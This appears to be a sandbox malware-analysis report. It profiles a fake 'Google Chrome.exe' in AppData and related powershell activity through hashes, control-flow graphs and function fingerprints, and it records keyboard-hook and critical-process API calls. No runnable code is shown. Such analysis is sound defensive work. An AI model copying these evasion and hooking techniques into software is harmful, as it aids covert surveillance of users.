                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0xe30000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:20.2%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:7
                                                    Total number of Limit Nodes:0
                                                    execution_graph 4534 7ffd348a4588 4535 7ffd348a4591 SetWindowsHookExW 4534->4535 4537 7ffd348a4661 4535->4537 4529 7ffd348a3c2d 4530 7ffd348a3c5b RtlSetProcessIsCritical 4529->4530 4531 7ffd348a3bed 4529->4531 4533 7ffd348a3d12 4530->4533

                                                    Executed Functions

                                                    Function 00007FFD348A8C06 Relevance: .5, Instructions: 474COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 481 7ffd348a8c06-7ffd348a8c13 482 7ffd348a8c15-7ffd348a8c1d 481->482 483 7ffd348a8c1e-7ffd348a8ce7 481->483 482->483 487 7ffd348a8ce9-7ffd348a8cf2 483->487 488 7ffd348a8d53 483->488 487->488 489 7ffd348a8cf4-7ffd348a8d00 487->489 490 7ffd348a8d55-7ffd348a8d7a 488->490 491 7ffd348a8d39-7ffd348a8d51 489->491 492 7ffd348a8d02-7ffd348a8d14 489->492 497 7ffd348a8de6 490->497 498 7ffd348a8d7c-7ffd348a8d85 490->498 491->490 493 7ffd348a8d18-7ffd348a8d2b 492->493 494 7ffd348a8d16 492->494 493->493 496 7ffd348a8d2d-7ffd348a8d35 493->496 494->493 496->491 500 7ffd348a8de8-7ffd348a8e90 497->500 498->497 499 7ffd348a8d87-7ffd348a8d93 498->499 501 7ffd348a8d95-7ffd348a8da7 499->501 502 7ffd348a8dcc-7ffd348a8de4 499->502 511 7ffd348a8efe 500->511 512 7ffd348a8e92-7ffd348a8e9c 500->512 503 7ffd348a8dab-7ffd348a8dbe 501->503 504 7ffd348a8da9 501->504 502->500 503->503 506 7ffd348a8dc0-7ffd348a8dc8 503->506 504->503 506->502 514 7ffd348a8f00-7ffd348a8f29 511->514 512->511 513 7ffd348a8e9e-7ffd348a8eab 512->513 515 7ffd348a8ead-7ffd348a8ebf 513->515 516 7ffd348a8ee4-7ffd348a8efc 513->516 521 7ffd348a8f2b-7ffd348a8f36 514->521 522 7ffd348a8f93 514->522 517 7ffd348a8ec3-7ffd348a8ed6 515->517 518 7ffd348a8ec1 515->518 516->514 517->517 520 7ffd348a8ed8-7ffd348a8ee0 517->520 518->517 520->516 521->522 524 7ffd348a8f38-7ffd348a8f46 521->524 523 7ffd348a8f95-7ffd348a9026 522->523 532 7ffd348a902c-7ffd348a903b 523->532 525 7ffd348a8f48-7ffd348a8f5a 524->525 526 7ffd348a8f7f-7ffd348a8f91 524->526 528 7ffd348a8f5c 525->528 529 7ffd348a8f5e-7ffd348a8f71 525->529 526->523 528->529 529->529 530 7ffd348a8f73-7ffd348a8f7b 529->530 530->526 533 7ffd348a903d 532->533 534 7ffd348a9043-7ffd348a90a8 call 7ffd348a90c4 532->534 533->534 541 7ffd348a90aa 534->541 542 7ffd348a90af-7ffd348a90c3 534->542 541->542
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8410c5f34781d7a0dd0c0334aa97239f06d8261159fdd649276d5d1136ded8a
                                                    • Instruction ID: 83396dda7ca4146c741b45274bd8c3930313f4c4fea89786c9ebc833e8aea4d2
                                                    • Opcode Fuzzy Hash: c8410c5f34781d7a0dd0c0334aa97239f06d8261159fdd649276d5d1136ded8a
                                                    • Instruction Fuzzy Hash: F4F1D830A0DA8D8FEBA8DF28C8557E937E1FF55310F04466EE84DC7291CB78A8458B91
                                                    Function 00007FFD348A99B2 Relevance: .5, Instructions: 460COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 573 7ffd348a99b2-7ffd348a99bf 574 7ffd348a99ca-7ffd348a9a97 573->574 575 7ffd348a99c1-7ffd348a99c9 573->575 579 7ffd348a9a99-7ffd348a9aa2 574->579 580 7ffd348a9b03 574->580 575->574 579->580 582 7ffd348a9aa4-7ffd348a9ab0 579->582 581 7ffd348a9b05-7ffd348a9b2a 580->581 589 7ffd348a9b96 581->589 590 7ffd348a9b2c-7ffd348a9b35 581->590 583 7ffd348a9ae9-7ffd348a9b01 582->583 584 7ffd348a9ab2-7ffd348a9ac4 582->584 583->581 586 7ffd348a9ac8-7ffd348a9adb 584->586 587 7ffd348a9ac6 584->587 586->586 588 7ffd348a9add-7ffd348a9ae5 586->588 587->586 588->583 592 7ffd348a9b98-7ffd348a9bbd 589->592 590->589 591 7ffd348a9b37-7ffd348a9b43 590->591 593 7ffd348a9b45-7ffd348a9b57 591->593 594 7ffd348a9b7c-7ffd348a9b94 591->594 598 7ffd348a9c2b 592->598 599 7ffd348a9bbf-7ffd348a9bc9 592->599 596 7ffd348a9b5b-7ffd348a9b6e 593->596 597 7ffd348a9b59 593->597 594->592 596->596 600 7ffd348a9b70-7ffd348a9b78 596->600 597->596 602 7ffd348a9c2d-7ffd348a9c5b 598->602 599->598 601 7ffd348a9bcb-7ffd348a9bd8 599->601 600->594 603 7ffd348a9bda-7ffd348a9bec 601->603 604 7ffd348a9c11-7ffd348a9c29 601->604 609 7ffd348a9ccb 602->609 610 7ffd348a9c5d-7ffd348a9c68 602->610 605 7ffd348a9bf0-7ffd348a9c03 603->605 606 7ffd348a9bee 603->606 604->602 605->605 608 7ffd348a9c05-7ffd348a9c0d 605->608 606->605 608->604 611 7ffd348a9ccd-7ffd348a9da5 609->611 610->609 612 7ffd348a9c6a-7ffd348a9c78 610->612 622 7ffd348a9dab-7ffd348a9dba 611->622 613 7ffd348a9c7a-7ffd348a9c8c 612->613 614 7ffd348a9cb1-7ffd348a9cc9 612->614 616 7ffd348a9c90-7ffd348a9ca3 613->616 617 7ffd348a9c8e 613->617 614->611 616->616 618 7ffd348a9ca5-7ffd348a9cad 616->618 617->616 618->614 623 7ffd348a9dbc 622->623 624 7ffd348a9dc2-7ffd348a9e24 call 7ffd348a9e40 622->624 623->624 631 7ffd348a9e26 624->631 632 7ffd348a9e2b-7ffd348a9e3f 624->632 631->632
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48ed36739e0e2140f0d26847efea997d2e40c9b06346731f2fa759876d6860a6
                                                    • Instruction ID: e6b3a9ec3bd3835bd01d31cb28f7c4113d77c73ddbc7415a39a96b3b5bf017fe
                                                    • Opcode Fuzzy Hash: 48ed36739e0e2140f0d26847efea997d2e40c9b06346731f2fa759876d6860a6
                                                    • Instruction Fuzzy Hash: 14E1B230A0DA4D8FEBA8DF28C8A57E977E1FF55310F04466AD84DC7291CB78E9458B81
                                                    Function 00007FFD348AACA5 Relevance: .4, Instructions: 428COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 741 7ffd348aaca5-7ffd348aaca9 742 7ffd348aacab-7ffd348aacac 741->742 743 7ffd348aacae-7ffd348aacaf 741->743 742->743 744 7ffd348aacb0-7ffd348aacbd 743->744 745 7ffd348aacbf 744->745 746 7ffd348aacc0-7ffd348aaccd 744->746 745->746 747 7ffd348aaccf 746->747 748 7ffd348aacd0-7ffd348aacea 746->748 747->748 748->744 750 7ffd348aacec 748->750 751 7ffd348aad66-7ffd348aad67 750->751 752 7ffd348aacee-7ffd348aad14 call 7ffd348a2710 750->752 754 7ffd348aad6e-7ffd348aada8 751->754 757 7ffd348aad16-7ffd348aad34 752->757 758 7ffd348aad3b-7ffd348aad46 752->758 767 7ffd348aadaa-7ffd348aadb6 754->767 768 7ffd348aae0e-7ffd348aae14 754->768 757->758 758->754 760 7ffd348aad48-7ffd348aad63 758->760 760->751 772 7ffd348aadb8-7ffd348aadcc 767->772 773 7ffd348aade0-7ffd348aade1 767->773 770 7ffd348aae16-7ffd348aae18 768->770 771 7ffd348aae03-7ffd348aae07 768->771 774 7ffd348aae71-7ffd348aae77 770->774 775 7ffd348aae1a-7ffd348aae22 770->775 771->774 786 7ffd348aadf6-7ffd348aae01 772->786 787 7ffd348aadcf-7ffd348aadde 772->787 780 7ffd348aae09 773->780 781 7ffd348aade2-7ffd348aadf4 773->781 778 7ffd348aae79 774->778 779 7ffd348aaea1-7ffd348aaec6 774->779 776 7ffd348aae4c-7ffd348aae60 775->776 777 7ffd348aae24-7ffd348aae38 775->777 795 7ffd348aae6c-7ffd348aae6f 776->795 777->776 791 7ffd348aae62 777->791 783 7ffd348aae7b-7ffd348aae84 778->783 784 7ffd348aae9f 778->784 798 7ffd348aaec8 779->798 799 7ffd348aaef0-7ffd348aaf0f 779->799 780->768 781->786 784->779 786->771 787->773 791->795 795->771 800 7ffd348aaeca-7ffd348aaed3 798->800 801 7ffd348aaeee 798->801 803 7ffd348aaf11 799->803 804 7ffd348aaf12-7ffd348aaf92 call 7ffd348a6970 799->804 801->799 803->804 812 7ffd348aaf94-7ffd348aafa6 804->812 813 7ffd348aafe1-7ffd348aaff1 804->813 814 7ffd348aafa8-7ffd348aafad 812->814 815 7ffd348aafaf-7ffd348aafb3 812->815 818 7ffd348aaff3-7ffd348aaff4 813->818 819 7ffd348ab044-7ffd348ab05a call 7ffd348ab0c0 813->819 817 7ffd348aafb6-7ffd348aafd1 call 7ffd348a6830 814->817 815->817 825 7ffd348aafd6-7ffd348aafe0 817->825 824 7ffd348aaffc-7ffd348ab042 call 7ffd348a6910 818->824 830 7ffd348ab05c-7ffd348ab068 819->830 831 7ffd348ab06a-7ffd348ab08a 819->831 824->818 824->819 825->813 832 7ffd348ab0a1-7ffd348ab0a9 call 7ffd348ab0fa 830->832 837 7ffd348ab09b-7ffd348ab0a0 831->837 838 7ffd348ab08c-7ffd348ab0b3 call 7ffd348ab0fa 831->838 840 7ffd348ab0b4-7ffd348ab0bf 832->840 837->832 838->840
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dffadf97718a380063aee28e0faf04dc9d858441f71f0e3f860309d92c8002c2
                                                    • Instruction ID: 754277d31b75dd108ae5857846d541b5bab6b06fb111dccfbc5c80895cfde0e2
                                                    • Opcode Fuzzy Hash: dffadf97718a380063aee28e0faf04dc9d858441f71f0e3f860309d92c8002c2
                                                    • Instruction Fuzzy Hash: AAD14A31F1DA4A4FEBD8EB6888A56F877E1FF46311F0441B9D50DD3192DE6CA8429390
                                                    Function 00007FFD348A1DCA Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 666b12322d9624c2be63cabb06a17d912f72cf922ed1605ae84ea5b736a681fd
                                                    • Instruction ID: f75f86aa78387a01d11bfacfeda62dc63d52ed57a99d24c6ba6bf34b73b20731
                                                    • Opcode Fuzzy Hash: 666b12322d9624c2be63cabb06a17d912f72cf922ed1605ae84ea5b736a681fd
                                                    • Instruction Fuzzy Hash: 1551C31170EAC50FE79697B898692657FD2DF8B220B0901FBE48DCB2A7CD595C468312
                                                    Function 00007FFD348A3C2D Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 59e68420339fb937f4b0862e70808b2ec835fb741240470f7487c9de78bdbe2a
                                                    • Instruction ID: b6293230dcb5a3c0752a4490196fd609aa1ea918085bc71cbb9bfc4ecf77c886
                                                    • Opcode Fuzzy Hash: 59e68420339fb937f4b0862e70808b2ec835fb741240470f7487c9de78bdbe2a
                                                    • Instruction Fuzzy Hash: 9341263190C7488FDB18DF98D895AE9BBF0FF56311F04416EE08AD3582CB786846CB91
                                                    Function 00007FFD348A4588 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 349 7ffd348a4588-7ffd348a458f 350 7ffd348a459a-7ffd348a460d 349->350 351 7ffd348a4591-7ffd348a4599 349->351 355 7ffd348a4699-7ffd348a469d 350->355 356 7ffd348a4613-7ffd348a4618 350->356 351->350 357 7ffd348a4622-7ffd348a465f SetWindowsHookExW 355->357 358 7ffd348a461f-7ffd348a4620 356->358 359 7ffd348a4667-7ffd348a4698 357->359 360 7ffd348a4661 357->360 358->357 360->359
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 53dd740df6f9ae9e05bd5515434da7980c54f82089685ab3b91a4c97a6cf38fa
                                                    • Instruction ID: 68670aea9209c93df8005cc37003aaa5af88c8d69c65d753297949101333b794
                                                    • Opcode Fuzzy Hash: 53dd740df6f9ae9e05bd5515434da7980c54f82089685ab3b91a4c97a6cf38fa
                                                    • Instruction Fuzzy Hash: D5410A31A0CA4D4FEB58DB9C98566F9BBE1EF59321F04027ED00DD3292CE75A81287C1

                                                    Non-executed Functions

                                                    Function 00007FFD348A0EFA Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4N_^$5N_^
                                                    • API String ID: 0-1922742659
                                                    • Opcode ID: 9bfb62ae935eaa0fa6f23420046b893bff0b7fe21cda30ab5b9ea0427fa18275
                                                    • Instruction ID: c59513914cc51e0e85ff2837ffd826b7fb89a7ec6959184ef9587bd8d2c9782a
                                                    • Opcode Fuzzy Hash: 9bfb62ae935eaa0fa6f23420046b893bff0b7fe21cda30ab5b9ea0427fa18275
                                                    • Instruction Fuzzy Hash: FAB1E523B0D5A21BE762B7FC68750EA7BA4DF4237870C51B7C2C8DB093ED6874468295
                                                    Function 00007FFD348A6955 Relevance: .5, Instructions: 475COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7109d7c0664c82ce3d707934fd0170f40d3ee528bdcd62d6f886f578503e4ab
                                                    • Instruction ID: 54ca4740b94a89fc2a263ec9e51b6bcbfe8d5ac291ebe52dfe9c6eebb015e669
                                                    • Opcode Fuzzy Hash: e7109d7c0664c82ce3d707934fd0170f40d3ee528bdcd62d6f886f578503e4ab
                                                    • Instruction Fuzzy Hash: 5AE1E031A0DA4C8FDB59EFA888957E9BBF0FF56310F0442AED04DE3192DA746845CB91

                                                    Executed Functions

                                                    Function 00007FFD3489947D Relevance: .5, Instructions: 467COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c10e8913213f69f021383aa26df86d86db3f74876adf3ecc53668b93d66b704e
                                                    • Instruction ID: 76d76fb659f2ac69fdec210a8105f2912f5b496740ceb66fca92fa38130c82f3
                                                    • Opcode Fuzzy Hash: c10e8913213f69f021383aa26df86d86db3f74876adf3ecc53668b93d66b704e
                                                    • Instruction Fuzzy Hash: 47E11D63A0EED20FE7529B6C5CB91A97F90EF53314B0901BBD198C7293DD1D68079B82
                                                    Function 00007FFD34966605 Relevance: .4, Instructions: 444COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5352a6dc95337873d1dee39135cdc667c5a8b96e26c94c53810965871460ed86
                                                    • Instruction ID: bb0c7084a4f92d6270068b7afa105193a0a166e54b21f3d65a9a4a897913df78
                                                    • Opcode Fuzzy Hash: 5352a6dc95337873d1dee39135cdc667c5a8b96e26c94c53810965871460ed86
                                                    • Instruction Fuzzy Hash: 00D13232A0EA890FEBA5AB6858B55B57BA0EF56330B0801FED54CC71E7D91CAC05C361
                                                    Function 00007FFD3489A0D3 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb9c690ffd06fc22e15f2bc4a8d53db476be36b1fae3ae98c3b8a7f6d8671a79
                                                    • Instruction ID: 611dfa42bfddbe2acde94aae716cd4c0c67087a2f97ea3ea317ad0014186d861
                                                    • Opcode Fuzzy Hash: fb9c690ffd06fc22e15f2bc4a8d53db476be36b1fae3ae98c3b8a7f6d8671a79
                                                    • Instruction Fuzzy Hash: A5113D76A0EBC45FDB539B2898790A47FB0EE63211B1E00EBC589CB0A3D91D5C09D793
                                                    Function 00007FFD34964073 Relevance: .2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1f341f71704cf26990f46e58a3b51fea260c5ceab273fd905a2d737fdd0c0f6
                                                    • Instruction ID: 051b3d625153849ffefe3fb7ddaf2d479338cd6a44ca8124db659c9efd9d2a99
                                                    • Opcode Fuzzy Hash: d1f341f71704cf26990f46e58a3b51fea260c5ceab273fd905a2d737fdd0c0f6
                                                    • Instruction Fuzzy Hash: 73515632B0CA568FEBA99A9C54B15B437D2EFA2230B0900BFC25DC7297DD2DEC058755
                                                    Function 00007FFD34964370 Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 864ba387f22a5d758a66af23d5c4f648163dcb7f980fc5ae030a258bd3229aca
                                                    • Instruction ID: 1835ad5ee203538a485e452621661f8bdf1d190571561c4e82317a28838e91c8
                                                    • Opcode Fuzzy Hash: 864ba387f22a5d758a66af23d5c4f648163dcb7f980fc5ae030a258bd3229aca
                                                    • Instruction Fuzzy Hash: 24413332B0DA898FEBA9DAAC54B19B477D1EF82334B4801BFD54DC7197E91DAC008394
                                                    Function 00007FFD3489A62C Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3b6fd38184237fc93bc7c73836893a3931f05703a767c9977987f8e7fe6ffd9
                                                    • Instruction ID: 3e6f96c2dd23d3de92515300de5b137c300fff38c346c3b10f100027ecd75f6b
                                                    • Opcode Fuzzy Hash: f3b6fd38184237fc93bc7c73836893a3931f05703a767c9977987f8e7fe6ffd9
                                                    • Instruction Fuzzy Hash: 1621F63190CB4C4FDB59DFAC988A7E97FF0EBA6321F04416BD448C3152DA74A41ACB92
                                                    Function 00007FFD349640BF Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f860e395a0b69c6291c7e9ae4d5481c0bda110cfbcb3342e8658d1834b18f0f2
                                                    • Instruction ID: e076941a87815a68d82fb10a26ed7bf1aeedbe9b409a00975162994528c377e7
                                                    • Opcode Fuzzy Hash: f860e395a0b69c6291c7e9ae4d5481c0bda110cfbcb3342e8658d1834b18f0f2
                                                    • Instruction Fuzzy Hash: 0D21F523B0DAA78FE7A5DA9844F057426D2EF72230B4A00BEC25DC719BCD2CEC049759
                                                    Function 00007FFD349643BC Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8a5fb2d4cfa15ff2b76bb42cd6c0b92bd750ead1b11567411c066c52f4c184e
                                                    • Instruction ID: e70d354c3e4058b2ac53af281fd365cf051400803042360f2be2114e8d10d9b3
                                                    • Opcode Fuzzy Hash: f8a5fb2d4cfa15ff2b76bb42cd6c0b92bd750ead1b11567411c066c52f4c184e
                                                    • Instruction Fuzzy Hash: C711E032A0E5858FE7A5DB9C84B19B87AD1EF4223478900BED54DC719ADA2DAC009364
                                                    Function 00007FFD3477E40A Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192402790.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd3477d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae3156e1155969d6f9809fe81d228d083bdfc6226dca786f2980ad387b77df6
                                                    • Instruction ID: f417f6fd9ac3ec8b2ade467ab5734049d9439ae99df63fbc41e0e02583c2080f
                                                    • Opcode Fuzzy Hash: 7ae3156e1155969d6f9809fe81d228d083bdfc6226dca786f2980ad387b77df6
                                                    • Instruction Fuzzy Hash: 7201F23265CE08CFDA58EB2DF485CA57BD0FB8432074045AED159CB166DA21F886CBC1
                                                    Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41
                                                    Function 00007FFD3477E41F Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192402790.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd3477d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                    • Instruction ID: d9043401412a7f83b8e90a1ac3508cb7853de775ba70a309675fcd231c91cb35
                                                    • Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                    • Instruction Fuzzy Hash: 52F0B770658E08DFCA94EF2DC885D223BE1FB983147514658E45EC7265D674F891CB80
                                                    Function 00007FFD3489A2A9 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 129bf1de96d6e2d94f777540af071bc1f4e6c2803d89694aac019220d6f1bade
                                                    • Instruction ID: 9230649f85df9eb1c4814c6012690cd6f7d9dfb3dd0376231c3a4a5aa83fd3bf
                                                    • Opcode Fuzzy Hash: 129bf1de96d6e2d94f777540af071bc1f4e6c2803d89694aac019220d6f1bade
                                                    • Instruction Fuzzy Hash: 31E04634804A8C8F8F48EF18C8998E97FE0FF69301B01429BE81DC7520DB759A58CBC2

                                                    Non-executed Functions

                                                    Function 00007FFD34898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^4$N_^7$N_^F$N_^J
                                                    • API String ID: 0-3508309026
                                                    • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                    • Instruction ID: 3b76da1c841fbdb11da6a3614379ab6690a2d8885d252c0cc13f4bf58231014a
                                                    • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
